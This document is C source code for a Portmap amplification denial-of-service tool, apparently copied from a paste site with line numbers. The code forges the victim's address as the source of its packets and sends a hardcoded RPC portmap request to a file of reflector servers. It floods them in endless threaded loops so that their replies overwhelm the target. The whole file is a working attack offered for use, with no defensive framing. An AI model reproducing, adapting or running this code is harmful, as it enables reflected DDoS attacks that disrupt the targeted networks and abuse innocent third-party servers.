/*Portmap amplification attack script. Credits to whoever coded the original.

1. /*
2. Portmap amplification attack script. Credits to whoever coded the original.
3. I only took the payload and port and modified it.
4. */
5.  
6. #include <time.h>
7. #include <pthread.h>
8. #include <unistd.h>
9. #include <stdio.h>
10. #include <stdlib.h>
11. #include <string.h>
12. #include <sys/socket.h>
13. #include <netinet/ip.h>
14. #include <netinet/udp.h>
15. #include <arpa/inet.h>
16. #define MAX_PACKET_SIZE 8192
17. #define PHI 0x9e3779b9
18. static uint32_t Q[4096], c = 362436;
19. struct list
20. {
21. struct sockaddr_in data;
22. struct list *next;
23. struct list *prev;
24. };
25. struct list *head;
26. struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
27. void init_rand(uint32_t x)
28. {
29. int i;
30. Q[0] = x;
31. Q[1] = x + PHI;
32. Q[2] = x + PHI + PHI;
33. for (i = 3; i < 4096; i++)
34. {
35. Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
36. }
37. }
38.  
39. uint32_t rand_cmwc(void)
40. {
41. uint64_t t, a = 18782LL;
42. static uint32_t i = 4095;
43. uint32_t x, r = 0xfffffffe;
44. i = (i + 1) & 4095;
45. t = a * Q[i] + c;
46. c = (t >> 32);
47. x = t + c;
48. if (x < c) {
49. x++;
50. c++;
51. }
52. return (Q[i] = r - x);
53. }
54.  
55. /* function for header checksums */
56. unsigned short csum (unsigned short *buf, int nwords)
57. {
58. unsigned long sum;
59. for (sum = 0; nwords > 0; nwords--)
60. sum += *buf++;
61. sum = (sum >> 16) + (sum & 0xffff);
62. sum += (sum >> 16);
63. return (unsigned short)(~sum);
64. }
65.  
66. void setup_ip_header(struct iphdr *iph)
67. {
68. iph->ihl = 5;
69. iph->version = 4;
70. iph->tos = 0;
71. iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 46;
72. iph->id = htonl(54321);
73. iph->frag_off = 0;
74. iph->ttl = random()%232;
75. iph->protocol = IPPROTO_UDP;
76. iph->check = 0;
77. iph->saddr = inet_addr("192.168.3.100");
78. }
79.  
80. void setup_udp_header(struct udphdr *udph)
81. {
82. udph->source = htons(5678);
83. udph->dest = htons(111);
84. udph->check = 0;
85. memcpy((void *)udph + sizeof(struct udphdr), "\x65\x72\x0A\x37\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86\xA0\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 40);
86. udph->len=htons(sizeof(struct udphdr) + 40);
87. }
88.  
89. void *flood(void *par1)
90. {
91. struct thread_data *td = (struct thread_data *)par1;
92. char datagram[MAX_PACKET_SIZE];
93. struct iphdr *iph = (struct iphdr *)datagram;
94. struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
95. struct sockaddr_in sin = td->sin;
96. struct list *list_node = td->list_node;
97. int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
98. if(s < 0){
99. fprintf(stderr, "Could not open raw socket.\n");
100. exit(-1);
101. }
102. init_rand(time(NULL));
103. memset(datagram, 0, MAX_PACKET_SIZE);
104. setup_ip_header(iph);
105. setup_udp_header(udph);
106. udph->source = sin.sin_port;
107. iph->saddr = sin.sin_addr.s_addr;
108. iph->daddr = list_node->data.sin_addr.s_addr;
109. iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
110. int tmp = 1;
111. const int *val = &tmp;
112. if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
113. fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
114. exit(-1);
115. }
116. int i=0;
117. while(1){
118. sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
119. list_node = list_node->next;
120. iph->daddr = list_node->data.sin_addr.s_addr;
121. iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
122. if(i==5)
123. {
124. usleep(0);
125. i=0;
126. }
127. i++;
128. }
129. }
130. int main(int argc, char *argv[ ])
131. {
132. if(argc < 4){
133. fprintf(stderr, "Invalid parameters!\n");
134. fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
135. exit(-1);
136. }
137. int i = 0;
138. head = NULL;
139. fprintf(stdout, "Setting up Sockets...\n");
140. int max_len = 128;
141. char *buffer = (char *) malloc(max_len);
142. buffer = memset(buffer, 0x00, max_len);
143. int num_threads = atoi(argv[4]);
144. FILE *list_fd = fopen(argv[3], "r");
145. while (fgets(buffer, max_len, list_fd) != NULL) {
146. if ((buffer[strlen(buffer) - 1] == '\n') ||
147. (buffer[strlen(buffer) - 1] == '\r')) {
148. buffer[strlen(buffer) - 1] = 0x00;
149. if(head == NULL)
150. {
151. head = (struct list *)malloc(sizeof(struct list));
152. bzero(&head->data, sizeof(head->data));
153. head->data.sin_addr.s_addr=inet_addr(buffer);
154. head->next = head;
155. head->prev = head;
156. } else {
157. struct list *new_node = (struct list *)malloc(sizeof(struct list));
158. memset(new_node, 0x00, sizeof(struct list));
159. new_node->data.sin_addr.s_addr=inet_addr(buffer);
160. new_node->prev = head;
161. new_node->next = head->next;
162. head->next = new_node;
163. }
164. i++;
165. } else {
166. continue;
167. }
168. }
169. struct list *current = head->next;
170. pthread_t thread[num_threads];
171. struct sockaddr_in sin;
172. sin.sin_family = AF_INET;
173. sin.sin_port = htons(atoi(argv[2]));
174. sin.sin_addr.s_addr = inet_addr(argv[1]);
175. struct thread_data td[num_threads];
176. for(i = 0;i<num_threads;i++){
177. td[i].thread_id = i;
178. td[i].sin= sin;
179. td[i].list_node = current;
180. pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
181. }
182. fprintf(stdout, "Starting Flood...\n");
183. if(argc > 5)
184. {
185. sleep(atoi(argv[5]));
186. } else {
187. while(1){
188. sleep(1);
189. }
190. }
191. return 0;
192. }